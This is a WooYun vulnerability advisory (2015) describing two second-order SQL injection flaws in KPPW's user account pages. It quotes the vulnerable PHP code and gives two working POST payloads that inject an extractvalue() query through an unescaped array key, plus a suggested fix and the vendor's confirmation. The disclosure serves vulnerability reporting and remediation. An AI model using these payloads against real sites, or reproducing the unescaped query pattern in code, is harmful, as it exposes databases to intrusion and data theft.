当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141694

漏洞标题:kppw最新版2处sql注入。

相关厂商:keke.com

漏洞作者: %270x5c

提交时间:2015-10-07 09:25

修复时间:2016-01-11 15:36

公开时间:2016-01-11 15:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-11: 厂商已经确认,细节仅向厂商公开
2015-10-14: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-05: 细节向核心白帽子及相关领域专家公开
2015-12-15: 细节向普通白帽子公开
2015-12-25: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

二次注入。

详细说明:

#1
/www/control/user/account_basic.php

.....
$arrMemberExts = kekezu::get_table_data ( "*", "witkey_member_ext", " type='sect' and uid= ".$gUid, "", "", "", "k" );
........
if ($sect) {
foreach ( $sect as $k => $v ) {
if ($arrMemberExts [$k])
db_factory::execute ( sprintf ( " update %switkey_member_ext set v1='%s' where k='%s' and uid='%d'", TABLEPRE, $v, $k, $gUid ) );
else {
$ext_obj = new Keke_witkey_member_ext_class ();
$ext_obj->setK ( $k );
$ext_obj->setV1 ( kekezu::escape ( $v ) );
$ext_obj->setUid ( $gUid );
$ext_obj->setType ( 'sect' );
$ext_obj->create_keke_witkey_member_ext ();
}
}
}


跟到create_keke_witkey_member_ext()

function create_keke_witkey_member_ext(){
$data = array();
if(!is_null($this->_ext_id)){
$data['ext_id']=$this->_ext_id;
}
if(!is_null($this->_uid)){
$data['uid']=$this->_uid;
}
if(!is_null($this->_k)){
$data['k']=$this->_k;
}
if(!is_null($this->_v1)){
$data['v1']=$this->_v1;
}
if(!is_null($this->_v2)){
$data['v2']=$this->_v2;
}
if(!is_null($this->_v3)){
$data['v3']=$this->_v3;
}
if(!is_null($this->_v4)){
$data['v4']=$this->_v4;
}
if(!is_null($this->_v5)){
$data['v5']=$this->_v5;
}
if(!is_null($this->_type)){
$data['type']=$this->_type;
}
return $this->_ext_id = $this->_db->inserttable($this->_tablename,$data,1,$this->_replace);
}


对于 post传入的 sect数组,先判断其键是否存在,存在则update,不存在就insert。
这里就出问题了,如果我们先提交sect[1'] 会insert values('1\'')
再重复提交一次的话, 就会进入update了,单引号就带进来了。
注册用户,
index.php?do=user&view=account&op=basic
post两次数据:

formhash=00a201&pk%5Buid%5D=10&is_perfect=1&indus_pid=-1&indus_id=-1&truename=%E5%98%89%E5%AE%A2&sex=-1&birthday=2015-09-09&email=a%**.**.**.**&sect%5Bemail%5D=1&mobile=18615478859&sect%5B1'and extractvalue(1,concat(0x5c,user()))#%5D=12222&qq=123213213&sect%5Bqq%5D=1&msn=&sect%5Bmsn%5D=1&phone=&sect%5Bphone%5D=1&province=p&city=c&area=a


11.png


#2
/www/control/user/account_contact.php

if($gUserInfo['city']){
$arrCity = CommonClass::getDistrictByPid($gUserInfo['province'],'id,upid,name');
}
if($gUserInfo['area']){
$arrArea = CommonClass::getDistrictByPid($gUserInfo['city'],'id,upid,name');
}
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
if($gUserInfo['uid'] != $pk['uid']){
kekezu::show_msg('无权操作',NULL,NULL,NULL,'error');
return false;
}
$arrData =array(
'email' =>$email,
'mobile'=>$mobile,
'qq' =>$qq,
'msn' =>$msn,
'phone' =>$phone,
'province'=>$province,
'city'=>$city,
'area'=>$area
);
$intRes = $objSpaceT->save($arrData,$pk);
if ($sect) {
foreach ( $sect as $k => $v ) {
if ($arrMemberExts [$k])
db_factory::execute ( sprintf ( " update %switkey_member_ext set v1='%s' where k='%s' and uid='%d'", TABLEPRE, $v, $k, $gUid ) );
else {
$ext_obj = new Keke_witkey_member_ext_class ();
$ext_obj->setK ( $k );
$ext_obj->setV1 ( kekezu::escape ( $v ) );
$ext_obj->setUid ( $gUid );
$ext_obj->setType ( 'sect' );
$ext_obj->create_keke_witkey_member_ext ();
}
}


前面的条件全满足即可注入。
/index.php?do=user&view=account&op=contact
post:

formhash=01b251&pk%5Buid%5D=10&is_perfect=1&indus_pid=-1&indus_id=-1&truename=%E5%98%89%E5%AE%A2&sex=-1&birthday=2015-09-09&email=a%**.**.**.**&sect%5Bemail%5D=1&mobile=18615478859&sect%5B1'and extractvalue(1,concat(0x5c,user()))#%5D=12222&qq=123213213&sect%5Bqq%5D=1&msn=&sect%5Bmsn%5D=1&phone=&sect%5Bphone%5D=1&province=p&city=c&area=a


11.png


漏洞证明:

11.png


11.png

修复方案:

判断键是否合法,update时 再转义下

版权声明:转载请注明来源 %270x5c@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-11 16:21

厂商回复:

感谢您的关注和支持,我们会尽快修复

最新状态:

暂无


漏洞评价:

评价